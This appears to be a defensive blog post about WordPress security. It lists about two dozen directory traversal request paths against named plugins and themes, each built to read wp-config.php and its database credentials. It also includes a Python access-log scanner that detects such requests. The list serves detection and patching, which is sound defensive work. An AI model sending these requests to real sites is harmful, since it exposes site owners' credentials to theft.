
Beware WordPress WP Exploits

Arguably (well, I'll argue it) the world's most beloved and widely used solution for managing a website's content is WordPress, mostly for its ease of installation, its huge library of third-party plugins and extensions, and the massive support it gets from the design community.

But that massive support also means massive exposure of the code and its structure, which gives those who would take advantage of it the opportunity to do so. Don't get me wrong: every CMS that opens its code for developers to extend and build on has the same problem.

If you do nothing else, make sure your WP installation is reviewed and updated monthly, keep your plugins and theme updated, and avoid the following exploits, which are causing havoc with sites everywhere:

WordPress Exploits (every one of these is a directory traversal request that abuses a plugin's or theme's file-download script to read wp-config.php, which holds the database credentials):

  • /wp-content/force-download.php?file=../wp-config.php HTTP/1.1
  • /wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php HTTP/1.1
  • /wp-content/plugins/filedownload/download.php/?path=../../../wp-config.php HTTP/1.1
  • /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php HTTP/1.1
  • /wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../wp-config.php HTTP/1.1
  • /wp-content/plugins/plugin-newsletter/preview.php?data=../../../../wp-config.php HTTP/1.1
  • /wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=../../../../wp-config.php HTTP/1.1
  • /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php HTTP/1.1
  • /wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php HTTP/1.1
  • /wp-content/themes/Newspapertimes_1/download.php?filename=../../../wp-config.php HTTP/1.1
  • /wp-content/themes/SMWF/inc/download.php?file=../../../../wp-config.php HTTP/1.1
  • /wp-content/themes/TheLoft/download.php?file=../../../wp-config.php HTTP/1.1
  • /wp-content/themes/acento/includes/view-pdf.php?download=1&file=../../../../wp-config.php HTTP/1.1
  • /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php HTTP/1.1
  • /wp-content/themes/corporate_works/downloader.php?file_download=../../../wp-config.php HTTP/1.1
  • /wp-content/themes/felis/download.php?file=../../../wp-config.php HTTP/1.1
  • /wp-content/themes/jarida/download.php?uri=../../../wp-config.php HTTP/1.1
  • /wp-content/themes/lote27/download.php?download=../../../wp-config.php HTTP/1.1
  • /wp-content/themes/markant/download.php?file=../../../wp-config.php HTTP/1.1
  • /wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php HTTP/1.1
  • /wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php HTTP/1.1
  • /wp-content/themes/tess/download.php?file=../../../wp-config.php HTTP/1.1
  • /wp-content/themes/yakimabait/download.php?file=../../../wp-config.php HTTP/1.1
  • /wp-content/themes/ypo-theme/download.php?download=../../../wp-config.php HTTP/1.1
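All of the requests above share one shape: a query parameter that climbs the tree with `..` and ends in wp-config.php. The script below is an added example (not from this post) that scans web server access-log lines for that shape, decoding URL-encoded and double-encoded variants so `..%2F` is caught as well as `../`, and flags the dangerous case where the server answered 200 (the file was actually served). The log lines are constructed samples, not real traffic.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed sample lines in combined log format; the IPs are documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2015:10:01:02 +0000] "GET /wp-content/themes/felis/download.php?file=../../../wp-config.php HTTP/1.1" 200 2741
203.0.113.5 - - [10/Mar/2015:10:01:03 +0000] "GET /wp-content/plugins/filedownload/download.php/?path=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 192
198.51.100.7 - - [10/Mar/2015:10:02:00 +0000] "GET /wp-content/themes/felis/download.php?file=brochure.pdf HTTP/1.1" 200 81234
198.51.100.9 - - [10/Mar/2015:10:03:00 +0000] "GET /wp-login.php HTTP/1.1" 200 3012
"""

# Combined log format: client ip, ident, user, [timestamp], "METHOD target PROTO", status, bytes.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Files that should never be fetchable through a download script.
SENSITIVE = {"wp-config.php"}


def is_traversal_read(target: str) -> bool:
    """True if any query value climbs with '..' and names a sensitive file."""
    _, _, query = target.partition("?")
    for _, value in parse_qsl(query, keep_blank_values=True):  # parse_qsl URL-decodes once
        v = unquote(value).replace("\\", "/")  # second decode catches double-encoded %252e%252e
        segments = v.split("/")
        if ".." in segments and segments[-1].lower() in SENSITIVE:
            return True
    return False


def scan_access_log(text: str) -> list:
    """Return one record per traversal attempt; 'served' marks a 200 response (file likely leaked)."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m or not is_traversal_read(m["target"]):
            continue
        status = int(m["status"])
        hits.append({"ip": m["ip"], "ts": m["ts"], "target": m["target"],
                     "status": status, "served": status == 200})
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        flag = "LEAKED?" if hit["served"] else "blocked"
        print(f'{hit["ts"]} {hit["ip"]} {hit["status"]} {flag} {hit["target"]}')
```

A 200 with a body of a few kilobytes on one of these requests means wp-config.php was served and the database credentials and salts should be rotated, not just the plugin patched.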